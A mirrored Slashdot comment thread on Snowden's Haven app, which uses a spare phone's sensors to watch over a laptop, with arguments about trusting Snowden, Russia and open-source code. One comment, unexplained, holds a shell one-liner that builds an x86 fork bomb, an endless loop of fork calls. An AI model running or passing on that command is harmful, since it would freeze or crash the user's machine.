Slashdot Mirror
Snowden's New App Haven Uses Your Smartphone To Physically Guard Your Laptop (theintercept.com)
An anonymous reader shares a report: The NSA whistleblower and a team of collaborators have been working on a new open source Android app called Haven that you install on a spare smartphone, turning the device into a sort of sentry to watch over your laptop. Haven uses the smartphone's many sensors -- microphone, motion detector, light detector, and cameras -- to monitor the room for changes, and it logs everything it notices. The first public beta version of Haven has officially been released; it's available in the Play Store and on F-Droid, an open source app store for Android.
the "bad guys" have to steal your phone AND your laptop now to get away with their cunning plan?
Mr. Hu is not a ninja.
not sure what to think... security or full on spying by to know WHEN you're out of the room or not so they can jack any secrets you may hold
Very interesting use case and development, but this is somewhat amusing to see that Snowden is posting his privacy apps to Google Play (in addition to F-droid)... It's not a good message sent to people in my opinion.
I think it's time that we get something alternative to Google and Apple, like project eelo.io seems to be starting.
Who are these collaborators, and where are they located? If they are from Snowden's new digs I would be concerned about giving their program access to my phone's sensors. In a perfect world, the open source community will drag a fine tooth comb through the code and we could be sure there was nothing malicious, but I don't believe in that world yet.
I'm sure that after requiring full access to all your phone's sensors, the app would never share that data with Russian hackers.
HE IS HERO FOR ALL PEOPLES
Indeed. Plus this already exists http://www.presencepro.com
Maybe your ability to travel will be impacted; My legs and car are working just fine.
KGB Phone!
Truly sounds like the land of the free.
Snowden lives in Russia, only visited China (PRC, not ROC).
Any other bright ideas?
Good job linking to the play store but not f-droid.
Hey. So long as we still have our guns, %^$NO CARRIER
Do the security services really need to enter your room and the open safe?
They know the room the interesting person is in due to the hotel, CC, ID used.
Everything networked in the room can be set to collect it all during your stay.
Sooner or later that secure laptop on average under the cell phone is going to be online again.
Having a need to use such software just makes the security services more sure the person is worth collecting on.
Once the security service know a person has such software their hotel room not be entered.
All surrounding hardware and networks will be used to try and access the persons laptop.
Physical access to the laptop can be done at any airport during a "random" request to look at the laptop.
Domestically once a person is in and out of their hotel room security services can just use a smart tv or other networks in a room to collect on the person of interest.
Domestic spying is now "Benign Information Gathering"
Here, have another one!
He has skills. He wrote his own WordPress theme.
Snowden's da man for standing up to these American thugs who spy on everybody around the world. Hopefully Snowden continues to expose the corrupt American government and perseveres in the end.
That was my thoughts as well, however despite the ego of software developers, making an app like that doesn't take super programming abilities, just some time and effort.
But my main worry is why should I trust an App built by a guy who admitted stealing NSA data? It is like getting your keys duplicated by an admitted house burglar.
If something is so important that you feel the need to post it on the internet... It probably isn't that important.
or just wait for the battery to die
Hero of the Soviet Union!
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;
So Snowden releases a 'spy app' on the same day the scope of Fancy Bear operations against journalism are exposed.
Um, no connection here, nothing to see, move on.
If that's the case, you're not doing "encrypted" properly.
... who is living in Russia at the pleasure of the Russian Government. Do you REALLY want to give a Russian-supplied application access to all the device's sensors? I know it's open source, but a lot of stuff can get hidden in code...
E pluribus unum
Isn't HERO FOR ALL PEOPLES == Hero of the Soviet Union?
Democracy is a sheep and two wolves deciding what to have for lunch. Freedom is a well armed sheep contesting the issue
Ooooh... a wordpress theme! Wow! Knowing that really makes me think he could code a secure application on Android without screwing it up!
Democracy is a sheep and two wolves deciding what to have for lunch. Freedom is a well armed sheep contesting the issue
I'd rather put my money on someone like that if they owned a piece of the pie, rather than a so-called "Enterprise developer" (translation: deceitful consultant bloatware maker)
Because:
1) he did not steal the data
2) he published it, and that is his crime
3) he is concerned about your privacy and gives you a tool to protect/warn you from/about NSA and other guys putting surveillance devices into your room
Cost free eBook I read (by iBook/Kobo/Amazon/ObookO/Gutenberg etc.): "The Green Odyssey" by Philip Jose Farmer.
im seeing a lot of suspicious attempts at character assassination in the comments and theyre fairly easy to debunk, so here goes.
Even worse, I believe he was a sharepoint admin...
check wikipedia or the guardian project to figure out what this man actually did and who he worked for. He was a BAH contractor. Just because your employer is too daft to assign you anything but a menial job shoveling the sharepoint shit, doesnt mean you're too stupid to do real work.
I'm sure that after requiring full access to all your phone's sensors, the app would never share that data with Russian hackers.
except that Haven is open source you tit. It has 5 developers and currently 1 asshole from slashdot trying to torpedo it
https://github.com/guardianpro...
Good people go to bed earlier.
He is a whistleblower because he published documents proving that the US government agency he was contracted to work for violated the law. I'm not sure why you are directing your anger at him.
Even if he did go searching for something and even if he did do it for fame (I dont believe so, given all he sacrificed. And his demeanor did not suggest that -- watch Laura Poitras' film.), he IS in fact a whistleblower who outed the US government for illegal activity. He did America and all Americans a favor.
His motivation for fame, and his premeditation of the act, do not change the impact. He provided the public with proof of the many ways in which the American government was grossly overstepping legal and moral boundaries in their spy-on-everyone antics.
This was something the public needed, because the American government was clearly in the wrong, and we need to hold them accountable for that.
Someone forgot to check the post anon box XD
equal, no. Inclusive of, yes.
How very interesting!
His motivation is in question here. Just because what you do happens to benefit me doesn't mean you're not a scumbag.
And second of all I don't know how much it did benefit me. Do you think the government stopped those programs and didn't replace them? I'm certainly not sure.
And your opinion of his performance in a movie is truly irrelevant.
Believe some of these guys were heroes. But when you find out they are sitting back with the Russian oligarchs and not saying shit about the US Nazi leadership the reality sets in. There are no heroes, just different kinds of opportunists.
Chris, people are now openly and proudly mocking you. You and your 6 YouTube subscribers.
But my main worry is why should I trust an App built by a guy who admitted stealing NSA data? It is like getting your keys duplicated by an admitted house burglar.
What next? You won't let a serial pedophile run a day care center or a rapist run a rape shelter? Madness!!! How dare you besmirch Glorious Leader Poot-in's best double agent.
Poot-in doesn't call them useful idiots for nothing...
this will enable to gather forensic data for a hack post mortem , but in no way will stop the hack in the first place , and if i know you are 30 min away , a hood and 15 minutes is all i need.
Pro tip: The US govt. should hire professional shills instead of unleashing an army of 19 year old Air Force sysadmins.
"Prediction: within 10 years, Windows will be a Linux distribution." Me, 7-6-2016
No. Peoples actually exist. The Soviet Union no longer does.
His motivation is as irrelevant as whether he parts his hair on the left or right. Nor, for that matter, does his seeking asylum in Russia. What is relevant is not Snowden; what is relevant is the illegal and unconstitutional practices of agencies of the USA government that Snowden exposed.
Your comments, Sir, have as much value as the food critic who damns the pastry chef for wearing a plaid apron over a striped shirt.
This is not an ad hominem attack. I don't know you well enough for that. This is an attack on your misplaced criticism, which
1) might be intentional on your part because you are incapable of coming up with something that was truly relevant to the issues Snowden raised, or
2) might be unintentional because you sent your comment before you engaged your brain, or
3) might be for any number of other miscellaneous reasons.
So you see, I just don't know enough about you to deliver an ad hominem attack.
They should have just named this 'Comrade Phonehome'.
All of the things this app claims to do for 'privacy and security' are easily spoofed/altered by a state level adversary to cover their tracks, don't really do anything about the backdoors (potential or verified) in signed and required baseband/bootloader firmware, and can easily be spoofed/exploited on both the spare phone and the computer if aiming for a targetted attack.
Worse yet, this provides plenty of 'free' surveillance access simply by tapping the already running datastream, and unless the data isn't recorded at some point, doesn't really provide verifiable proof that can't be covered for later if the operator of the devices isn't paying constant attention (and if you are the target of either an automated attack, or state level passive surveillance, you are just giving them extra tools to get you with.)
Snowden is a burned asset. Much like OpenSSL, just because nobody has proven the security exploits this can allow, doesn't mean a malicious actor wasn't busy designing/injecting these into the codebase.
It's more like getting your locks from and admitted burglar.
Bruce Schneier: China and Russia Almost Definitely Have the Snowden Docs
For the next link, here is the banner greeting. Read it then read the view below.
Help support Little Green Footballs!
The unthinkable is now reality. Donald Trump is the President of the United States. And Little Green Footballs is a determined part of the resistance to his bigoted and destructive policies. But more than ever, we're going to need your help to continue providing quality independent journalism and commentary, friends — so please consider making a donation to the Little Green Footballs fund today.
Edward Snowden’s a Hero, All Right - to China and Russia
Sympathy meter now at absolute zero
By Charles Johnson
6/16/13 4:42:24 pm
Well now. I’m at a loss to understand how Edward Snowden’s latest disclosures could possibly have been inspired by his much-vaunted concerns about civil liberties, since he’s now revealing details about US espionage against Russia.
American spies based in the UK intercepted the top-secret communications of the then Russian president, Dmitry Medvedev, during his visit to Britain for the G20 summit in London, leaked documents reveal.
The details of the intercept were set out in a briefing prepared by the National Security Agency (NSA), America’s biggest surveillance and eavesdropping organisation, and shared with high-ranking officials from Britain, Australia, Canada and New Zealand.
The document, leaked by the NSA whistleblower Edward Snowden and seen by the Guardian, shows the agency believed it might have discovered “a change in the way Russian leadership signals have been normally transmitted”.
The most salient point: this is not news in any sense. You would have to be one of the most naïve people on Earth to not realize that the US spies on Russia, Russia spies on the US, and in general, heads of state from any freaking country spy on each other, friendly or not, all the time, forever and ever, amen.
But that doesn’t mean it’s insignificant when a US citizen reveals this kind of information to Russia, either. I had already lost any shred of sympathy for Mr. Snowden when he dumped secret documents to a pro-Beijing newspaper, but this demonstrates beyond a doubt that his sole purpose in leaking these secrets is to embarrass the US government.
It is entirely reasonable to have grave concerns about what Edward Snowden did. He not only released US documents, but had ones from Canada, UK, Australia, and probably many others too, including France, Germany, and Sweden.
I think this plays a part in why Snowden is so regarded:
Gangster, Al Capone Started One of the First Soup Kitchens During the Great Depression
Crime boss, gangster, and lawbreaker are the most common words used to describe Al Capone, one of the most notorious men of the 20th century. . . .
However, most people haven’t heard of the charitable support that Capone offered during a hard period for many Americans. In the 1930s, the Great Depression left a lot of citizens hungry and unemployed. Although he was a criminal to many, Capone was also respected community leader for a lot of people due to his charity. Some say that he did more for the citizens of Chicago, Illinois than the state itself did.
Al Capone’s Soup Kitchen . . . served over 120,000 meals to hungry people. The free soup kitchen kept regular working hours, serving breakfast, lunch, and dinner and fed thousands every day despi
(I dont believe so, given all he sacrificed. And his demeanor did not suggest that -- watch Laura Poitras' film.),
CNN headline: Snowden to newspaper: I took contractor job to gather evidence
Laura Poitras was a collaborator with Snowden. Why would you think she would portray him in a bad light?
much of left-wing thought is a kind of playing with fire by people who don't even know that fire is hot - George Orwell
So you need this app that pretty much spies on you for your own security.
This hasn't been tried before, it should pan out gg 10/10 absolutely no double standards anywhere
You really freaking don't get Snowden or why some of us appreciate him. There's not been any soup. I don't even know what you're comparing to the soup, and I actually don't think you do either. You couldn't even explain that payoff or gratifying factor.
It doesn't take much historical or political theory to see why what the NSA is doing fundamentally breaks the contract between the government and citizens that characterizes the USA. If you're an authoritarian and might makes right, well... you don't understand what the USA is supposed to be at least for the citizens it recognizes as such. But if you imagine yourself at all interested in the rule of law or the rights of people even against politically powerful entities, you're being dissonant and duped.
The USA's agencies make the East German Stasi look crude and, if you're outside the sphere of privilege, benign.
If you paid any attention to the expansion of war powers between Bush, Obama, and now Trump's administration and applied the same observation and concern to technology, you'd be clear on the danger and why Snowden did the world a huge favor.
he should make an app that detects activities that we like to keep private and alert the user whenever they are detected to make them more aware of the privacy implications of have a computer with so many sensors in your pocket all the time.
"why should I trust an App built by a guy who admitted stealing NSA data"
It depends on whether you think that he stole data from the NSA, or that he took data from the NSA gathered from the people it was supposed to serve as proof of their illicit activities.
There is a big difference between a selfish coward and someone who risks everything for what is right. It would be nice if people had enough attention span to discern between the two, but it could also be because most people cannot relate to sacrifice for a higher cause.
Your post has no content or value. If you don't understand how critical someone's motivations are in their actions, there's no point in talking to you. This "the enemy of my enemy is my friend" reasoning is brainless.
You really freaking don't get Snowden or why some of us appreciate him.
I appreciate him revealing several documents that outed that the NSA spying on US citizens.
I absolutely hate him for revealing the other million plus documents that had nothing to do with that but that exposed many other US secrets. So much so that I believe he was the primary turning point that eventually lead to the current situation of Russia's rise and boldness directly attacking US elections.
making an app like that doesn't take super programming abilities, just some time and effort\
Sooo.... like most software?
But my main worry is why should I trust an App built by a guy who admitted stealing NSA data?
It's OSS. I guess you hope that not a few people will be pouring over the code looking for issues.
https://github.com/guardianpro...
I seriously doubt Snowden had much to do with this other than giving it his stamp of approval. The primary (only?) contributor is not Snowden (obviously).
I know it's open source, but a lot of stuff can get hidden in code...
Because we're all running background checks on the authors of the OSS we use, right? Or maybe you are looking to see if they use words like "comrade" in their comments. That's probably good enough.
Because it's even harder to trust someone who didn't steal NSA data.
Da comrade. Comrades Snow-dan and Poo-tan have much care about privacy. Poo-tan great and best leader of all world!
Much more so than Russia.
Before snowden we just thought we lived in a police state. After the snowden revelations we know we live in a police state.
All actions that were illegal are now legal, capture of the system is complete.
Rather than roll back unacceptable powers all the actors have doubled down. Nothing happened, voters care more about gay marriage and right to choose than fundamental liberties.
You referenced littlegreenfootballs? Really?
I know, they are living in a freedom loving country that offered asylum because of its long standing commitment to open culture, citizen privacy, and free speech, so they felt it was important to protect the noble whistleblower. A country that leads the world in its protection of open journalism and has for centuries, well decades anyway, led the struggle against state surveillance of citizens.
Apparently they were so impressed with Snowden's nobility of purpose that they awarded him a state pension immediately he arrived. Of course, his travel was sponsored by the British Guardian newspaper, itself a noble advocate of free speech and opposition to global warming, now enthusiastically promoting the noble Corbyn, having belatedly finally discovered his nobility when his takeover of the Labour Party was secured. A paper that has systematically revealed the iniquities of various US organizations, and has usefully countered the disgusting neo-liberal capitalist denigration by the evil Murdoch Press of the great contribution of the Soviet Revolution to human freedom and well being.
Maybe the Guardian gives them a stipend too?
Well anyway, these are my kind of guys and I will download and install their app right away. They are about the only people I would trust with accessing all my sensors on my mobile. I mean, anyone else, how do you know who is sponsoring them?
I hope they keep their app up to date. I am sure they will make the updates available immediately to everyone who has installed it.
... are easily separated.
You are failing to recognise that Snowden's actions and motivations are only germane to a very minor distraction from the major story that concerns the contents of the data he released. Why is this distraction so important? Does the color of the envelope affect the meaning of the message in the letter?
I think not.
I don't much care why Snowden did what he did or whether he was a heroic patriot or a snivelling traitor. I don't think anyone outside his circle of family and acquaintances should care very much about that right now. For one thing, it is very unlikely that any irrefutable proof one or the other will ever come to the fore, and it is a waste of time and energy to involve yourself in unresolvable arguments. Maybe when Snowden is brought to trial assessments of his character should become part of the public discourse, but now that is just shadow boxing.
What I do care about is persons who seek to distract others from significant issues with these kinds of meaningless arguments. What is significant here is what Snowden has revealed: agencies of the USA government have been engaged in unamerican activities. Do you have anything to say about how to keep that from happening, or do you simply want to distract people from thinking about it for some reason?
The suspiciously large number of comments trashing this idea seem to indicate that some people have a vested interest in this *not* being used or popular. I wonder why?
A lot of the points made are totally bogus.
The idea is you use this on a *spare* phone - so it won't be able to gather any useful data and you would only need to have it turned on at all when you were (e.g.) leaving your laptop in a hotel room, so the only thing this device would know about *you* is where you are - when you are *already* in a 'well-known place'.
If people use it only as intended there would be virtually no point whatsoever of including spyware.
Also, because of its origins and purpose this code is going to get a *lot* more scrutiny than your average FOSS.
It would make it a lot more difficult to (say) install a physical keylogger on your laptop without you being aware. It might not protect you if you were prime target of a three letter agency with the resources to deal with such a device but it might well protect you from industrial espionage and more general spying.
maybe your definition of a scumbag and mine are very different. Would you also hate someone who goes bursting in saving children from child rapists, just because he wants to see his face in the headlines? Do you spend any time to find out whether the firemen or similar jobs save lives or families because the job pays well or they just like the social respect the job gives them?